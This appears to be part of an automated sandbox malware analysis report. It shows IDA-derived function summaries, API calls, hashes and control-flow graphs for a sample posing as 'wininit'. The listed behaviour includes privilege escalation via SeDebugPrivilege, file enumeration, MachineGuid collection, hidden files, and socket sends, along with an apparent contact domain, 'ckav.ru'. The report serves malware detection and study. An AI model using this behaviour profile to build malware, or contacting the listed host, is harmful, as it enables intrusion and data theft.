176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                • String ID: %s\%s$%s\*$Program Files$Windows
                                                                                                                                • API String ID: 1690352074-2009209621
                                                                                                                                • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                                                                                                • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                                                                                                • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                                                                                                • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                                                                                                APIs
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                • API String ID: 3615134276-2896544425
                                                                                                                                • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                                                                • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                                                                                                • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                                                                • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                                                                                                APIs
                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1357844191-0
                                                                                                                                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                                                                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                                                                                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                                                                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                                                                                                • _wmemset.LIBCMT ref: 00406244
                                                                                                                                • _wmemset.LIBCMT ref: 00406261
                                                                                                                                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: _wmemset$ErrorInformationLastToken
                                                                                                                                • String ID: IDA$IDA
                                                                                                                                • API String ID: 487585393-2020647798
                                                                                                                                • Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                                                                                                                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                                                                                • Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                                                                                                                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                                                                                                                                APIs
                                                                                                                                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                                                                                • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                                                                                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: freeaddrinfogetaddrinfosocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2479546573-0
                                                                                                                                • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                                                                                                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                                                                                • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                                                                                                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                                                                                                                APIs
                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AllocCreateReadVirtual
                                                                                                                                • String ID: .tmp
                                                                                                                                • API String ID: 3585551309-2986845003
                                                                                                                                • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                                                                • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                                                                                                • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                                                                • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                                                                                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                                                                                • GetLastError.KERNEL32 ref: 0041399E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Error$CreateLastModeMutex
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3448925889-0
                                                                                                                                • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                                                                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                                                                                • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                                                                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                                                                                                APIs
                                                                                                                                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                                                                                                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CreatePointerWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3672724799-0
                                                                                                                                • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                                                                • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                                                                                                • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                                                                • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                                                                                                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                                                                                                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                                                  • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$CreateFreeProcessThread_wmemset
                                                                                                                                • String ID: ckav.ru
                                                                                                                                • API String ID: 2915393847-2696028687
                                                                                                                                • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                                                                • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                                                                                                • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                                                                • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                                • _wmemset.LIBCMT ref: 0040634F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$AllocateProcess_wmemset
                                                                                                                                • String ID: CA
                                                                                                                                • API String ID: 2773065342-1052703068
                                                                                                                                • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                                                                                                • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                                                                                                • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                                                                                                • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                                                                                                APIs
                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationToken
                                                                                                                                • String ID: IDA
                                                                                                                                • API String ID: 4114910276-365204570
                                                                                                                                • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                                                                • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                                                                                                • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                                                                • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                                                                                                APIs
                                                                                                                                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc
                                                                                                                                • String ID: s1@
                                                                                                                                • API String ID: 190572456-427247929
                                                                                                                                • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                                                                • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                                                                                                • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                                                                • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                                                                                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$AllocateOpenProcessQueryValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1425999871-0
                                                                                                                                • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                                                                                                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                                                                                • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                                                                                                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                                                                                                APIs
                                                                                                                                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CheckMembershipToken
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1351025785-0
                                                                                                                                • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                                                                • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                                                                                                • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                                                                • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDirectory
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4241100979-0
                                                                                                                                • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                                                                • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                                                                                                • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                                                                • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                                                                                                APIs
                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                                                                • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                                                                                                • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                                                                • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                                                                                                APIs
                                                                                                                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: send
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2809346765-0
                                                                                                                                • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                                                                • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                                                                                                • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                                                                • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                                                                                                APIs
                                                                                                                                • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileMove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3562171763-0
                                                                                                                                • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                                                                • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                                                                                                • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                                                                • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                                                                                                APIs
                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Startup
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 724789610-0
                                                                                                                                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                                                                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                                                                                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                                                                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                                                                                                APIs
                                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                                                                • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                                                                                                • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
